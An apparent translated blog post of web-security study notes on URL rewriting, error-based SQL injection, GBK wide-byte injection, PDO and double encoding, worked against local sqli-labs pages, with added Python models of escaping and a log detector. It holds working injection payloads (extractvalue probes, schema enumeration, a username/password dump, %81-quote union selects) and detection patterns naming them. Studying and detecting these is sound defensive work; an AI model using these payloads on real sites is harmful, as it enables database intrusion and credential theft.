10.24 Pseudo-static pages, error-based injection, wide-byte injection

Building pseudo-static pages

http://www.test.com/index.php?id=1 (vulnerable)

http://www.test.com/index.html (a static page only displays data, so its security is very high)

http://www.test.com/1.html

http://www.test.com/add_1.html

Steps

Step 1: enable the rewrite mechanism for the site. In the Apache configuration file, find

LoadModule rewrite_module modules/mod_rewrite.so

and remove the comment character in front of it. Apache must also be allowed to process .htaccess files: in the same configuration file find "AllowOverride None", change None to All, and restart Apache.

Step 2: create a .htaccess file and write the rewrite rules into it:

RewriteEngine on

RewriteRule ([0-9]{1,})\.html$ index.php?id=$1

Rewrite rule explained: ([0-9]{1,}) matches one or more digits and captures them as $1; \. is an escaped literal dot; html$ means the URL must end in html.

 

Requested page: http://127.0.0.1/weijingtai/2-add.html

Matching rule: RewriteRule ([0-9]{1,})-([a-zA-Z]{1,})\.html$ index.php?id=$1&para=$2

Request that actually reaches the script: http://127.0.0.1/weijingtai/index.php?id=2&para=add
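The two rewrite rules above, modelled in Python so the mapping can be checked offline. This is an added example, not code from the original notes: it searches each pattern against the requested path the way mod_rewrite does (the pattern is not anchored at the start, and without an [L] flag the rewritten URL is handed to the next rule) and replaces the whole path with the substitution. The parameter name para is taken from the rewritten request on the page; the sample paths are constructed.

```python
import re

# (pattern, substitution) in the order Apache evaluates them. The regex syntax
# used in the page's RewriteRule lines is also valid Python regex syntax;
# Apache's $1/$2 back-references become \1/\2.  "para" is the page's parameter name.
REWRITE_RULES = [
    (re.compile(r"([0-9]{1,})\.html$"), r"index.php?id=\1"),
    (re.compile(r"([0-9]{1,})-([a-zA-Z]{1,})\.html$"), r"index.php?id=\1&para=\2"),
]


def rewrite(request: str) -> str:
    """Return the internal request index.php sees for a path relative to the
    .htaccess directory, or the request unchanged when no rule matches (Apache
    then serves the path as it is).  Without an [L] flag the result of one rule
    is tested against the next rule, which is what the loop does."""
    path, _, query = request.partition("?")   # RewriteRule patterns see the path only
    matched = False
    for pattern, substitution in REWRITE_RULES:
        m = pattern.search(path)              # search, not match: no implicit ^ anchor
        if m:
            path, _, query = m.expand(substitution).partition("?")
            matched = True
    if not matched:
        return request
    return path + ("?" + query if query else "")


if __name__ == "__main__":
    # Constructed requests: the page's own examples plus two non-matching ones.
    for req in ("1.html", "add_1.html", "2-add.html", "2-add'.html", "index.php?id=1"):
        print(f"{req:18} -> {rewrite(req)}")
```

Two things the model makes visible: because the first pattern is unanchored, add_1.html also maps to index.php?id=1 (only the digits before .html are captured), and a request for index.php?id=1 matches no rule, so the dynamic script behind the pseudo-static URLs is still reachable directly.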

 

Error-based injection steps

Step 1: test the injection point

Step 2: get database information (the current database)

http://127.0.0.1/sqli-labs-master/Less-5/?id=2' and extractvalue(1,concat(0x7e,(database()),0x7e))%23+

Step 3: table names

select distinct table_name from information_schema.tables where table_schema=database() limit 0,1

Step 4: get the specified fields of the table

Step 5: get the content

select concat(username,'|',password) from users limit 0,1

The retrieved values can then be decrypted.

 

Wide-byte injection

mysql_query("SET NAMES 'gbk'"); // set the connection character set

mysql_set_charset("GBK"); // set the connection character set

mysql_real_escape_string() is used to escape (filter) the parameters. Functions with a similar role are addslashes(), mysql_escape_string() (deprecated after PHP 5.3) and the magic quotes module (magic_quotes_gpc). They act on special characters such as ' " \ NUL < > and so on.

GBK encoding: a character encoding in which one character is encoded as two bytes.

 

http://127.0.0.1/sqli-labs-master/Less-32/?id=-1%81' union select 1,user(),3%23


Wide-byte injection in sqli-labs Less-32

http://127.0.0.1/sqli-labs-master/Less-32/?id=-1%81' union select 1,2,3%23

Defense: set the connection character set with mysql_set_charset("GBK"), so that the escaping function knows which encoding the connection uses, and escape input with mysql_real_escape_string().
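Why the %81 byte defeats charset-blind escaping, and what a charset-aware escaper changes, as an added Python model (not code from the original notes or from sqli-labs). escape_bytewise mimics addslashes()-style escaping that looks at one byte at a time. escape_gbk_aware is modelled after the rule the page's defense relies on: an escaper that knows the connection charset is GBK copies complete two-byte characters untouched and escapes a stray lead byte so it can never pair with the backslash that follows. literal_survives is a simplified model of how a GBK-aware SQL lexer walks the body of a single-quoted literal; the input bytes are constructed for the demo.

```python
QUOTE, DQUOTE, BACKSLASH, NUL = 0x27, 0x22, 0x5C, 0x00


def is_gbk_lead(b: int) -> bool:
    return 0x81 <= b <= 0xFE


def is_gbk_trail(b: int) -> bool:
    return 0x40 <= b <= 0x7E or 0x80 <= b <= 0xFE


def gbk_char_len(data: bytes, i: int) -> int:
    """2 if data[i:i+2] is a well-formed two-byte GBK character, else 1."""
    if is_gbk_lead(data[i]) and i + 1 < len(data) and is_gbk_trail(data[i + 1]):
        return 2
    return 1


def escape_bytewise(data: bytes) -> bytes:
    """Charset-blind escaping in the style of addslashes(): a backslash is put
    in front of every special byte, regardless of the bytes around it."""
    out = bytearray()
    for b in data:
        if b in (QUOTE, DQUOTE, BACKSLASH, NUL):
            out.append(BACKSLASH)
        out.append(b)
    return bytes(out)


def escape_gbk_aware(data: bytes) -> bytes:
    """Escaping that knows the connection charset is GBK (modelled after the
    behaviour the page's fix depends on): a complete two-byte character is
    copied as-is; a byte that looks like a lead byte but does not form a valid
    character is itself escaped, so it cannot swallow the next backslash."""
    out = bytearray()
    i = 0
    while i < len(data):
        n = gbk_char_len(data, i)
        if n == 2:
            out += data[i:i + 2]
        else:
            b = data[i]
            if b in (QUOTE, DQUOTE, BACKSLASH, NUL) or is_gbk_lead(b):
                out.append(BACKSLASH)
            out.append(b)
        i += n
    return bytes(out)


def literal_survives(escaped: bytes) -> bool:
    """Simplified GBK-aware lexer for the body of a '...' literal: a valid
    two-byte character is consumed whole, a backslash consumes exactly one
    following byte, an unescaped quote ends the literal early.  True means the
    whole input stayed inside the literal (nothing leaked into the SQL)."""
    i = 0
    while i < len(escaped):
        n = gbk_char_len(escaped, i)
        if n == 2:
            i += 2
            continue
        b = escaped[i]
        if b == BACKSLASH:
            i += 2              # escape sequence: skip the escaped byte
            continue
        if b == QUOTE:
            return False        # literal terminated here; the rest is parsed as SQL
        i += 1
    return True


# Constructed input in the shape of the page's Less-32 value: 0x81 then a quote.
WIDE_BYTE_INPUT = b"-1\x81' union select 1,2,3#"


def demo() -> dict:
    blind = escape_bytewise(WIDE_BYTE_INPUT)    # ... \x81 \x5c \x27 ...: 0x81 0x5c is one GBK char
    aware = escape_gbk_aware(WIDE_BYTE_INPUT)   # ... \x5c \x81 \x5c \x27 ...: lead byte escaped first
    return {
        "bytewise": blind, "bytewise_safe": literal_survives(blind),
        "gbk_aware": aware, "gbk_aware_safe": literal_survives(aware),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:15} {value!r}")
```

With byte-wise escaping the output contains the sequence 81 5C 27: the lexer reads 81 5C as one character and the quote that follows is live. With charset-aware escaping the stray 0x81 is escaped on its own, the quote is escaped after it, and the literal stays closed. A well-formed GBK character (for example D6 D0) passes both escapers unchanged, which is why this only shows up with crafted lead bytes.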

 

PDO wide-byte injection

PDO: connect to the database -> set up the statement template -> bind the data -> execute the SQL statement

$conn->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);

With emulated prepares disabled, PDO uses real server-side prepared statements, so the bound values are never spliced into the SQL text on the client side.

 

Double-encoding injection

The browser URL-encodes form data once by default, and the server decodes it once when the data arrives.

PHP's URL-decoding functions are urldecode() and rawurldecode(). If the application calls one of them again after its own filtering, a doubly encoded payload passes the filter in encoded form and only takes its real shape afterwards.
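A defender-side complement to the double-encoding note and to the injection sections above: an added Python log check (the access-log lines are constructed for the demo and are not from the original post) that decodes each request's query string repeatedly until it stops changing and then looks for the probes this page shows, the extractvalue() error-based probe, information_schema enumeration, a union select, and a GBK lead byte immediately before a quote. The last sample line has extractvalue( encoded twice, so it only appears after the second decoding round, which is exactly what an application that decodes again after filtering would see.

```python
import re
from typing import List
from urllib.parse import unquote_to_bytes


def normalise(query: str, rounds: int = 3) -> bytes:
    """Decode percent-encoding until the value stops changing (bounded by
    rounds).  One round is what the server hands to the script; a second round
    is what a script that calls urldecode()/rawurldecode() again works on."""
    data = query.encode("utf-8")
    for _ in range(rounds):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    return data


# Bytes patterns, because a decoded %81 is not valid text.
SIGNATURES = [
    ("error-based", re.compile(rb"extractvalue\s*\(", re.I)),
    ("schema-enum", re.compile(rb"information_schema\.", re.I)),
    ("union", re.compile(rb"\bunion\b.*?\bselect\b", re.I | re.S)),
    # a GBK lead byte (0x81-0xFE) directly before a quote or backslash
    ("wide-byte", re.compile(rb"[\x81-\xfe][\x27\x22\x5c]")),
]


def classify_query(query: str, rounds: int = 3) -> List[str]:
    data = normalise(query, rounds)
    return [name for name, pattern in SIGNATURES if pattern.search(data)]


REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def classify_log_line(line: str, rounds: int = 3) -> List[str]:
    """Pull the request target out of a combined-format access log line and
    classify its query string; lines without a query string yield []."""
    m = REQUEST_RE.search(line)
    if not m or "?" not in m.group(1):
        return []
    return classify_query(m.group(1).split("?", 1)[1], rounds)


# Constructed log lines (not real traffic); the payload shapes are the page's.
LOG_LINES = [
    '127.0.0.1 - - [24/Oct/2019:10:00:01 +0800] "GET /sqli-labs-master/Less-5/?id=2 HTTP/1.1" 200 713',
    '127.0.0.1 - - [24/Oct/2019:10:00:02 +0800] "GET /sqli-labs-master/Less-5/?id=2%27%20and%20extractvalue(1,concat(0x7e,(database()),0x7e))%23 HTTP/1.1" 200 520',
    '127.0.0.1 - - [24/Oct/2019:10:00:03 +0800] "GET /sqli-labs-master/Less-32/?id=-1%81%27%20union%20select%201,2,3%23 HTTP/1.1" 200 735',
    '127.0.0.1 - - [24/Oct/2019:10:00:04 +0800] "GET /index.php?id=2%2527%2520and%2520extractvalue%25281,database()%2529%2523 HTTP/1.1" 200 520',
]


def scan(lines=LOG_LINES, rounds: int = 3) -> List[List[str]]:
    return [classify_log_line(line, rounds) for line in lines]


if __name__ == "__main__":
    for line, hits in zip(LOG_LINES, scan()):
        print(hits or ["clean"], line.split('"')[1])
    print("single decode misses the double-encoded line:", scan(rounds=1)[3])
```

Decoding only once leaves the fourth line looking harmless (extractvalue%28 does not match), so a filter or detector that normalises a single time sees a different request than a script that decodes twice.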

 

HTTP header injection

 


Source: www.cnblogs.com/x98339/p/11733366.html